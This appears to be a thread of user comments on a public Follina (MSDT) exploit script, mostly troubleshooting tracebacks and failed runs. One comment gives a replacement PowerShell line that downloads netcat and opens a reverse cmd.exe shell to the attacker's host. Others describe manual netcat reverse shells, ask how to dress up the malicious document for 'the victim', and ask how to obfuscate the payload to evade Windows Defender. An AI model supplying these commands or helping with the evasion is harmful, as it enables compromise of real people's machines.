I am hitting this error when trying to reverse connect to my server. Could it be outdated python problem or is it something wrong with the code?

python3 follina.py  -i 10.10.10.106
[+] copied staging doc /tmp/yyfwqh86
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
----------------------------------------
Exception happened during processing of request from ('10.10.10.101', 13406)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 320, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 351, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "follina.py", line 134, in __init__
    super().__init__(*args, directory=serve_path, **kwargs)
TypeError: __init__() got an unexpected keyword argument 'directory'

This repeats several times

PLEASE FIX

Reverse shell command requires new port every time you run the code. I needed to change it like 5 times.

• I tried it on my windows 11 virtual machine and it does not work, it works on my windows 10 main computer tho.
  Great job with a code tho and i can not wait to see how Microsoft will address this issue.

How to add text or any content in the maldoc generated file and send it to the victim.

It keeps saying [!] error detering http hosting address. did you provide an interface or ip? when i try to do for example "python follina.py -c "notepad"

Traceback (most recent call last):
File "/root/Desktop/msdt-follina/follina.py", line 63, in main
serve_host = ipaddress.IPv4Address(args.interface)
File "/usr/lib/python3.9/ipaddress.py", line 1307, in init
self._ip = self._ip_int_from_string(addr_str)
File "/usr/lib/python3.9/ipaddress.py", line 1194, in _ip_int_from_string
raise AddressValueError("Expected 4 octets in %r" % ip_str)
ipaddress.AddressValueError: Expected 4 octets in 'eth0'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/root/Desktop/msdt-follina/follina.py", line 166, in
main(parser.parse_args())
File "/root/Desktop/msdt-follina/follina.py", line 66, in main
serve_host = netifaces.ifaddresses(args.interface)[netifaces.AF_INET][0][
KeyError: 2

When I do the python3 follina,py command I get this. Traceback (most recent call last): File "/home/user/msdt-follina/follina.py", line 8, in <module> import netifaces ModuleNotFoundError: No module named 'netifaces' Any help?

it was working well for a day after that there is no troubleshooting the passkey keep showing.
I reinstall the tool and the office but still the same.
I changed the default browser but still the same.
what to do next?

Hi,

I trying the PoC, but I am prompted to fill a passkey. Does anybody has the same issue?

In a freshly installed VM it does not trigger the MSDT at all. Is it possible that Microsoft have patched it already?

~/msdt-follina $ python3 follina.py
Traceback (most recent call last):
File "/data/data/com.termux/files/home/msdt-follina/follina.py", line 8, in
import netifaces
ModuleNotFoundError: No module named 'netifaces'

Hello,

When i try to execute the .doc file, it contact my server to download exploit.html but nothing happens.
What's more, when i reach exploit.html directly, it opens the mstd but with passkey and nothing happens....

I use Open Office 2019 and Windows 10. Do you have an idea about this issue ? I try on Windows 11 too.

Thank you.

in doc/word/_rels/document.xml.rels

Target="{staged_html}!"

Follina.py line 96

external_referral = external_referral.replace(
    "{staged_html}", f"http://{serve_host}:{args.port}/index.html"
)

results, Target="http://192.168.0.1:8000/index.html!"
leaves so much to be desired xD

after executing the document, the msdt tool is asking for passkey, which is why the exploit is facing issues to get the desired output. Any workaround ?

Hi

I tested the exploit in the home environment by using Xampp web server with HTML script at Localhost location. The document is opened with the Word notification: "This document contains links that may refer to other files (...). If I allow updating links (Word 2019) then the msdt.exe is executed as a child process of Word (also sdiagnhost.exe is executed). If I do not allow updating links, then nothing happens (msdt.exe is not executed). If I correctly understand this exploit, then such notification should appear on Word's default settings when a default Word setting is enabled (Update automatic links at open)

In all examples available on the web this notification about embedded links is absent.
Is this behavior related to the design of your POC, or maybe there can be another reason?

Thank you.

According to Readme.md you should be able to get a reverse shell just by running python3 follina.py -r 9001, this didn't work for me and i had to manually download netcat on the victim machine from "https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe" then run nc.exe -e cmd.exe $HOST_IP to successfully get a reverse shell in the attacker box.

Invoke-WebRequest complains about creating an SSL connection.

This can be fixed by changing line 113 in follina.py with:
command = f"""[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""

I think this may have been patched.
DOC opens but no payload.
Tell me if I am wrong here.

Is there a way to set the contents of the file so that it is not just blank? Is there a way to convert an existing file to a corrupted one?

First of all: thanks for your work, been a subscriber to your YouTube for quite some time now and highly enjoy it.

This is the reason why I immediately needed to try this one when I saw the repo. Sadly, it doesn't seem to work - at least not for my setup.

I can build the doc just fine and the server starts. When I then open the doc, I do see a lot of requests, but nothing seems to happen beyond that, i.e. the command (I tried several, including calc and notepad) is not executed.

What concerns me is that I get a lot of "unsupported method (OPTIONS)" log messages (see screenshot).

I am running this from a Windows 10 machine (also tried WSL Kali, same result) and opening the doc on Windows 10 as well.

Thought I'd leave this here in case you want to further improve your tool (or tell me that I did something wrong).

Thanks again. Hoping this will be helpful.

I'm getting an error on my server when opening the malicious document on the target device. I'm not particularly familiar with Python, so there may be something basic I'm missing. Server: CentOS 8 Stream, Victim: Windows 10, Office Version: 18.1903.1152.0

Exception happened during processing of request from ('myIpAddr', 52247) Traceback (most recent call last): File "/usr/lib64/python3.6/socketserver.py", line 320, in _handle_request_noblock self.process_request(request, client_address) File "/usr/lib64/python3.6/socketserver.py", line 351, in process_request self.finish_request(request, client_address) File "/usr/lib64/python3.6/socketserver.py", line 364, in finish_request self.RequestHandlerClass(request, client_address, self) File "/home/username/Payload/msdt-follina/follina.py", line 134, in __init__ super().__init__(*args, directory=serve_path, **kwargs) TypeError: __init__() got an unexpected keyword argument 'directory'

I tried the exploit but and i have a question now :
The exploit is done when the Windows Defender is off. dose it that means the vulnerability still exists in msdt service. and Windows prevents it just using defender? if so, what would it be if we obfuscatethe html payload ? dose it bypass the antivirus. how defender is preventing this exploit ? it's signature base or it prevents calling msdt through web ?
this is the message i got from the windows antivirus :

can we test this exploit on a real machine will it harm my system

Command:
python3 follina.py -i 'https://c37d-2003-f4-2720-a380-5810-4952-ef4-2125.eu.ngrok.io'
Output:
[!] error detering http hosting address. did you provide an interface or ip?
Is there a way to fix this?

the revers connection dosen't work alot of times sometime it work but alot of time it dosent

Does someone else have the same issue.

Thanks!

Can we use the malicious word document and bypass Windows Defender ?